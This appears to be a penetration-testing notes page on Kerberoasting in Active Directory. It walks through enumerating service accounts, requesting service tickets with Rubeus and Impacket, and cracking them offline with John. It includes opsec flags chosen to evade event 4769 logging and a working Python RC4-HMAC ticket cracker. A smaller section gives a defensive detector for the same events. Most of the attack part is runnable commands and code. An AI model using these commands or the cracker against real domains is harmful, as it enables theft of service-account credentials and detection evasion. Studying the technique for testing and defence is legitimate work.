# Kerberoast

<figure><img src="/files/E3t9Yu69XSFXikEdRXuw" alt=""><figcaption></figcaption></figure>

## Kerberoast

* Offline cracking of **service account** passwords. Any authenticated domain user can ask the KDC for a service ticket (TGS) for any registered SPN, and the KDC hands it over without checking whether the requester is allowed to use that service. The ticket is encrypted with the service account's long-term key, so the password can be attacked offline with no further contact with the domain. Pre-authentication settings play no role here; a disabled pre-auth flag is what **AS-REP roasting** abuses, not Kerberoast.
* **Enumerate SPNs**: The attacker enumerates user accounts that have a `servicePrincipalName` set. Computer accounts carry SPNs too, but their passwords are long random strings and not worth cracking, so the interesting targets are user objects used as service accounts.

{% code overflow="wrap" %}

```powershell
### Windows

# AD Module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

# PowerView
Get-DomainUser -SPN

# Rubeus: statistics on roastable accounts (supported encryption types, pwdLastSet year) without requesting any ticket
.\Rubeus.exe kerberoast /stats
```

{% endcode %}

{% code overflow="wrap" %}

```bash
### Linux

# Metasploit framework
msf> use auxiliary/gather/get_user_spns

# Impacket: enumerate SPN users and request a ticket for each in one go (password is prompted)
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast
# Same, authenticating with the NT hash instead of a password
GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast

# kerberoast: https://github.com/skelsec/kerberoast
# 1. Enumerate kerberoastable users over LDAP; writes kerberoastable_spn_users.txt
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -o kerberoastable
# 2. Request a ticket for every listed user and dump the hashes
kerberoast spnroast 'kerberos+password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes
```

{% endcode %}

* **Request Service Tickets**: Holding a valid TGT, the attacker requests a service ticket (TGS) for each of those SPNs. Every request produces a Kerberos service ticket event (4769) on the domain controller, which is what the opsec options below try to keep inconspicuous.

{% code overflow="wrap" %}

```powershell
# Roast a single account and print the hash in one line
Rubeus.exe kerberoast /user:svcadmin /simple

# Opsec: /rc4opsec roasts only accounts that do not support AES (and uses the tgtdeleg trick),
# so no RC4 downgrade request (etype 0x17 for an AES-capable account) is logged in event 4769
Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec

# Kerberoast all possible accounts and write the hashes to a file (bad opsec: one burst of 4769 events for every SPN)
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
```

{% endcode %}
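Why `/rc4opsec` matters, shown from the defender's side as an added example (not code from the page or from Rubeus): a check over Security event 4769. Each TGS-REQ above produces one 4769 on the DC carrying the requested Ticket Encryption Type; one user collecting RC4 (0x17) tickets for many distinct service accounts in a short window is the classic Kerberoast signature. The log lines, accounts, service names and addresses below are constructed for the example, and the field layout is a condensed stand-in for the real event text.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Each line condenses the fields of Windows
# Security event 4769 "A Kerberos service ticket was requested": requesting account,
# target service account (Service Name), Ticket Encryption Type, client address.
SAMPLE_4769 = """\
2024-05-01T09:00:01 Account=alice@CORP.LOCAL Service=krbtgt EncType=0x12 Client=10.0.0.5
2024-05-01T09:00:03 Account=alice@CORP.LOCAL Service=FS01$ EncType=0x12 Client=10.0.0.5
2024-05-01T09:15:10 Account=bob@CORP.LOCAL Service=svcsql EncType=0x17 Client=10.0.0.9
2024-05-01T09:15:10 Account=bob@CORP.LOCAL Service=svcweb EncType=0x17 Client=10.0.0.9
2024-05-01T09:15:11 Account=bob@CORP.LOCAL Service=svcbackup EncType=0x17 Client=10.0.0.9
2024-05-01T09:15:11 Account=bob@CORP.LOCAL Service=svcadmin EncType=0x17 Client=10.0.0.9
2024-05-01T09:15:12 Account=bob@CORP.LOCAL Service=svcreport EncType=0x17 Client=10.0.0.9
2024-05-01T10:30:00 Account=legacyapp$@CORP.LOCAL Service=FS01$ EncType=0x17 Client=10.0.0.7
"""

LINE_RE = re.compile(r"^(\S+) Account=(\S+) Service=(\S+) EncType=(0x[0-9a-fA-F]+) Client=(\S+)$")
RC4_HMAC = 0x17  # Ticket Encryption Type for RC4-HMAC; 0x11 / 0x12 are AES128 / AES256


def parse_4769(text):
    """Parse the condensed event lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, account, service, etype, client = m.groups()
            events.append({"time": datetime.fromisoformat(ts), "account": account,
                           "service": service, "enctype": int(etype, 16), "client": client})
    return events


def detect_kerberoast(events, threshold=3, window=timedelta(minutes=5)):
    """Flag accounts that obtain RC4 service tickets for >= threshold distinct
    services inside one sliding window. TGT renewals (service krbtgt) are ignored,
    and a single legacy RC4 ticket (legacyapp$ above) stays under the threshold."""
    rc4_by_account = defaultdict(list)
    for e in events:
        if e["enctype"] == RC4_HMAC and e["service"].lower() != "krbtgt":
            rc4_by_account[e["account"]].append(e)
    findings = {}
    for account, evs in rc4_by_account.items():
        evs.sort(key=lambda e: e["time"])
        for i, first in enumerate(evs):
            services = {e["service"] for e in evs[i:] if e["time"] - first["time"] <= window}
            if len(services) >= threshold:
                findings[account] = sorted(services)
                break
    return findings


if __name__ == "__main__":
    for account, services in detect_kerberoast(parse_4769(SAMPLE_4769)).items():
        print(f"possible Kerberoast by {account}: RC4 tickets for {', '.join(services)}")
```

The rule keys on the encryption type and the burst, which is exactly what `/rc4opsec` avoids (no RC4 request for AES-capable accounts) and what `/user:` plus a slow cadence avoids (no burst). Tune `threshold` and `window` against the number of genuinely RC4-only services in the environment before deploying anything like this.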

* **Extract Ticket**: The returned TGS is encrypted with the service account's long-term key. For RC4-HMAC (etype 23) that key is simply the account's NT hash; for AES it is a key derived from the password and a salt, which is far slower to crack and the reason the tools above prefer to request RC4 tickets.
* **Crack Password**: The tools above already write the ticket out in `$krb5tgs$` form; alternatively the ticket can be exported from the logon session's cache (e.g. Mimikatz `kerberos::list /export`) and converted. The hash is then attacked offline with a wordlist or brute force, so every candidate password is tested locally and the domain sees nothing.

{% code overflow="wrap" %}

```powershell
# John autodetects the $krb5tgs$ lines; --format=krb5tgs makes the choice explicit
john.exe --format=krb5tgs --wordlist=C:\AD\Tools\kerberoast\10kworst-pass.txt C:\AD\Tools\hashes.txt
```

{% endcode %}
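What the cracker actually does with a `$krb5tgs$23$...` line, as an added example that is not code from the page, Rubeus, Impacket or John: the RC4-HMAC (etype 23) construction from RFC 4757 reduced to a wordlist check. The checksum at the front of the ticket's enc-part is an HMAC over the plaintext under a key derived from the NT hash, so each candidate password can be verified locally by re-deriving the keys, decrypting and recomputing the HMAC. The service account, SPN, password, confounder and ticket plaintext are constructed stand-ins (a real enc-part is a DER-encoded EncTicketPart with a random confounder); MD4 is implemented inline because hashlib on OpenSSL 3 builds often refuses it.

```python
import hashlib
import hmac
import struct


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4. Needed because Kerberos RC4-HMAC keys are NT hashes = MD4(UTF-16LE(password))."""
    mask = 0xFFFFFFFF
    rot = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    ff = lambda x, y, z: (x & y) | (~x & z)
    gg = lambda x, y, z: (x & y) | (x & z) | (y & z)
    hh = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1: words 0..15 in order
            a = rot((a + ff(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: words 0,4,8,12,1,5,...
            a = rot((a + gg(b, c, d) + x[(i % 4) * 4 + i // 4] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: words 0,8,4,12,2,10,... (bit-reversed index)
            a = rot((a + hh(b, c, d) + x[int(format(i, "04b")[::-1], 2)] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def ntlm_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); RC4 is symmetric, so this both encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


KEY_USAGE_TGS_REP_TICKET = 2  # RFC 4120 key usage number for the ticket enc-part in a TGS-REP


def rc4_hmac_encrypt(key, plaintext, confounder, usage=KEY_USAGE_TGS_REP_TICKET):
    """RFC 4757: K1 = HMAC-MD5(K, usage); checksum = HMAC-MD5(K1, confounder||plaintext);
    K3 = HMAC-MD5(K1, checksum); output = checksum || RC4(K3, confounder||plaintext)."""
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    data = confounder + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, data)


def to_hashcat(user, realm, spn, enc_part):
    """hashcat 13100 / john krb5tgs line: $krb5tgs$23$*user$REALM$spn*$checksum$edata2."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${enc_part[:16].hex()}${enc_part[16:].hex()}"


def check_password(hashline, password, usage=KEY_USAGE_TGS_REP_TICKET):
    """Offline test of one candidate: derive K1/K3 from the candidate NT hash and the
    ticket's own checksum, decrypt, and see whether the checksum verifies."""
    _, checksum_hex, edata_hex = hashline.rsplit("$", 2)
    checksum, edata = bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)
    k1 = hmac.new(ntlm_hash(password), struct.pack("<I", usage), hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    data = rc4(k3, edata)
    return hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum)


def crack(hashline, wordlist):
    return next((pw for pw in wordlist if check_password(hashline, pw)), None)


# Constructed sample (not a real ticket): hypothetical svcsql account with an assumed weak password.
SERVICE_PASSWORD = "Summer2023!"
CONFOUNDER = b"\x00\x01\x02\x03\x04\x05\x06\x07"  # fixed for reproducibility; a KDC uses 8 random bytes
TICKET_PLAINTEXT = b"constructed stand-in for the DER-encoded EncTicketPart"
SAMPLE_HASH = to_hashcat("svcsql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433",
                         rc4_hmac_encrypt(ntlm_hash(SERVICE_PASSWORD), TICKET_PLAINTEXT, CONFOUNDER))
WORDLIST = ["Welcome1", "Password1", "Summer2023!", "P@ssw0rd"]  # constructed mini wordlist

if __name__ == "__main__":
    print(SAMPLE_HASH)
    print("cracked:", crack(SAMPLE_HASH, WORDLIST))
```

Each candidate costs one MD4, three HMAC-MD5s and one RC4 pass over the ticket, which is why RC4 tickets fall to GPU cracking so quickly; AES tickets (`$krb5tgs$17$` / `$krb5tgs$18$`) need a PBKDF2 key derivation with 4096 iterations per candidate on top of that.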

